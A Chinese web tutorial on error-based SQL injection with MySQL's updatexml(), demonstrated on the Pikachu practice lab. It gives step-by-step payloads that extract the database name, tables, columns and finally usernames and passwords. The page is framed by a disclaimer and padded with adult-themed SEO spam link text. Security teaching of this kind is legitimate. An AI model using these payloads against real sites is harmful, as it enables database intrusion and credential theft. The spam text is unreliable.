日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁技術文章
文章詳情頁

詳解SQL報錯盲注

瀏覽:182日期:2023-03-06 14:25:14
目錄
  • 一、SQL報錯函數詳解
  • 二、SQL報錯盲注payload構造
    • 1、updatexml語句構造思路
    • 2、查詢當前數據庫
    • 3、查詢表名
    • 4、查詢列名
    • 5、查詢字段名
    • 6、查詢數據

今天繼續給大家介紹Linux運維相關知識,本文主要內容是SQL報錯盲注詳解。

免責聲明:
本文所介紹的內容僅做學習交流使用,嚴禁利用文中技術進行非法行為,否則造成一切嚴重后果自負!
再次強調:嚴禁對未授權設備進行滲透測試!

一、SQL報錯函數詳解

updatexml();floor();extractvalue();等函數都可以用于構造SQL報錯函數,今天我們主要來講解使用updatexml()函數。
updatexml()函數使用格式如下:

updatexml(XML_document,XPath_string,new_value)

XML_document是String格式的XML文檔名稱,XPath_string是XPath格式的字符串,new_value是String格式的而字符串,用于替換查找到的符合條件的數據。
該函數有一個特性,即如果XPath_string不是XPath格式的字符串,就會報錯并顯示處XPath的值,因此,我們可以利用這一特性實現SQL報錯盲注。此外,我們還可以利用updatexml()函數的特性,實現在SQL插入、刪除等語句中的SQL注入。

二、SQL報錯盲注payload構造

1、updatexml語句構造思路

updatexml()函數的構造,首先需要閉合SQL語句中的冒號、括號。其次還需要使用and或者or語句連接成一個單獨的語句,這樣即可成功執行updatexml()函數中的語句。
下面,我以皮卡丘靶場為例,來簡單介紹一下updatexml報錯注入payload的構造思路,皮卡丘靶場SQL insert/update型注入頁面如下所示:

從上圖中可以看出,該頁面功能上是提供人員的注冊,因此可以猜測其內部是insert類型的SQL語句,因此我們可以在手機、住址等列(一般不要選擇密碼,因為很多網站都會把密碼進行md5處理,從而導致我們的updatexml失效)中插入我們的updatexml語句。通過簡單的實驗可以得知,該站點的注入閉合為單引號,因此payload的構造格式為:

12" or updatexml() or"

2、查詢當前數據庫

當我們確定updatexml()函數的格式后,我們就可以寫實際的payload語句了,相關命令如下所示:

12"or updatexml(1,concat(0x7e,database(),0x7e),0) or"

從上payload可以看出,updatexml()函數有三部分組成,我們需要把我們要執行的SQL語句寫到第二部分,第二部分是一個concat()函數,之所以要拼接0x7e是因為該16進制字符是一個波浪線,也可以換成其他的字符。
該payload執行結果如下所示:

從上圖可以看出,我們當前的數據庫名為pikachu。

3、查詢表名

查詢表名的payload如下所示:

12" or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),0) or "

在上述payload中,concat中間的SQL語句要用括號括起來,然后寫入正常的查詢命令即可,該payload執行結果如下所示:

從上圖可以看出,我們查詢到當前數據庫存在一個名為httpinfo的表,如果我們更改limit的限制,那么我們可以得到更多的表。

4、查詢列名

查詢列名的payload如下所示:

12" or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="users"),0x7e),0) or "

該payload構造原理與以上類似,執行結果如下所示:

5、查詢字段名

字段名查詢的payload如下所示:

12" or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="pikachu"),0x7e),0) or "

該payload構造原理與以上類似,執行結果如下所示:

6、查詢數據

數據查詢的payload如下所示:

12" or updatexml(1,concat(0x7e,(select concat(username,"-",password) from users limit 0,1),0x7e),0) or "

該payload構造原理與以上類似,執行結果如下所示:

到此這篇關于SQL報錯盲注詳解的文章就介紹到這了,更多相關SQL報錯盲注內容請搜索以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持!

標簽: MsSQL
日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
欧美一区激情| 成人三级高清视频在线看| 欧美黄色网页| 日韩一区二区三区在线免费观看| 97精品国产| 亚洲二区精品| 亚洲一区欧美二区| 日韩三级久久| 老牛国内精品亚洲成av人片| 国产精品久久久久9999高清| 久久免费福利| 91精品综合| 先锋影音久久久| 日韩av字幕| 国产成人精品福利| 欧美日韩国产免费观看视频| 午夜日韩av| 91九色综合| 亚洲啊v在线| 蜜臀久久久久久久| 久久久精品国产**网站| 蜜桃精品在线| 日韩欧美中文字幕电影| 国产一区二区三区黄网站| 久久高清免费| 日韩区欧美区| 久久蜜桃资源一区二区老牛| 亚洲欧洲日韩精品在线| 精品精品久久| 视频一区国产视频| 免费看久久久| 伊人久久成人| 欧美黄色一区| 夜夜精品视频| 久久精品国产久精国产| 国产毛片久久| 国产成人精品一区二区免费看京 | 综合一区二区三区| 久久字幕精品一区| 99国产精品视频免费观看一公开| 日韩福利视频一区| 99精品视频在线观看免费播放| 日韩国产在线观看| 欧美va亚洲va日韩∨a综合色| 国产麻豆一区| 合欧美一区二区三区| 久久中文精品| 亚洲一区二区三区四区电影| av最新在线| 国产欧美另类| 麻豆亚洲精品| 成人免费网站www网站高清| 久久激情av| 鲁大师影院一区二区三区| 日韩高清成人| 成人午夜网址| 国产欧美大片| 亚洲三级视频| 99亚洲视频| 亚洲1234区| 激情综合五月| 国产精品亚洲产品| 亚洲97av| 亚洲少妇诱惑| 亚洲一级影院| 天堂中文在线播放| 国产成人免费视频网站视频社区| 欧美专区一区| 蜜臀av亚洲一区中文字幕| 欧美日韩水蜜桃| 免费一二一二在线视频| 国产suv精品一区二区四区视频| 欧美日韩亚洲一区在线观看| 蜜臀va亚洲va欧美va天堂| 日韩午夜一区| 欧美日韩国产高清电影| 欧美一区二区三区高清视频| 神马久久午夜| 97精品一区| 国产专区精品| 免费一级欧美片在线观看网站| 日韩va亚洲va欧美va久久| 亚洲精品三级| 最新国产精品| 日韩国产精品久久久| 亚洲精品看片| 91精品尤物| 国产欧美啪啪| 国产精品观看| 国产欧美日韩在线一区二区| 国产亚洲字幕| 国产日韩欧美一区在线| 国产麻豆一区二区三区精品视频| 视频一区中文字幕精品| 亚洲精品观看| 欧美久久亚洲| 老司机精品视频网| 中文字幕成在线观看| 日韩精品中文字幕第1页| 日本精品影院| 中国女人久久久| 亚洲精一区二区三区| 欧美天堂在线| 国产在线日韩精品| 在线中文字幕播放| 久久精品影视| 99日韩精品| 日韩欧美中文字幕在线视频| 日韩成人一级| 精品国产欧美日韩一区二区三区| 福利视频一区| 欧美不卡在线| 视频一区日韩精品| 国产精品久久久久久久久久久久久久久 | 日韩中文欧美在线| 亚洲精品福利| 国产精品1区在线| 成人亚洲一区二区| 久久蜜桃资源一区二区老牛| 免费看日韩精品| 国产日本亚洲| 欧美黄色一区二区| 日韩精品午夜| 免费观看日韩电影| 久久av免费| 国产综合精品一区| 婷婷综合一区| 精品国产一区二区三区2021| 青青久久av| 综合一区av| 国产精品成人a在线观看| 午夜国产精品视频| 欧美日韩亚洲三区| 99精品美女| 亚洲精品在线国产| 国产成人精品一区二区免费看京 | 激情婷婷综合| 青青在线精品| www成人在线视频| 综合一区av| 亚洲啊v在线| 日韩在线网址| 日韩精品一区二区三区免费观影 | 国产亚洲一区二区手机在线观看| 国产视频亚洲| 久久99久久久精品欧美| 日本韩国欧美超级黄在线观看| 综合一区在线| 欧洲一级精品| 国产欧美日韩一区二区三区四区 | 欧美成a人国产精品高清乱码在线观看片在线观看久 | 日韩精品视频在线看| 日韩欧美国产精品综合嫩v| 丝袜美腿亚洲色图| 丁香婷婷久久| 综合国产精品| 国产亚洲一区二区手机在线观看 | 欧美亚洲自偷自偷| 在线日韩欧美| 精品网站999| 亚洲欧美久久精品| 视频二区不卡| 欧美aⅴ一区二区三区视频| 亚洲一区二区三区高清| 91日韩免费| 欧美精品三级在线| 亚洲在线观看| 日韩一区自拍| 日韩不卡免费视频| 国产精品色网| 久久久久国产精品一区二区| 国产精品成人国产| 香蕉久久国产| 欧美中文一区二区| 久草精品视频| 久久精品999| 亚洲乱码视频| 在线亚洲自拍| 欧美va天堂在线| xxxxx性欧美特大| 精品国产精品久久一区免费式| 日韩高清不卡在线| 亚洲有吗中文字幕| 婷婷综合社区| 久久久久国产| 日韩电影在线视频| 精品国产网站| 欧美精品不卡| 日韩va亚洲va欧美va久久| 亚洲伊人影院| 日本 国产 欧美色综合| 99国产精品99久久久久久粉嫩| 成人日韩在线观看| 日韩欧美午夜| 日韩和的一区二在线| 国产精品久久久久久久免费观看 | 国产调教精品| 日韩黄色av| 日韩av一区二区在线影视| 蜜桃av一区二区在线观看|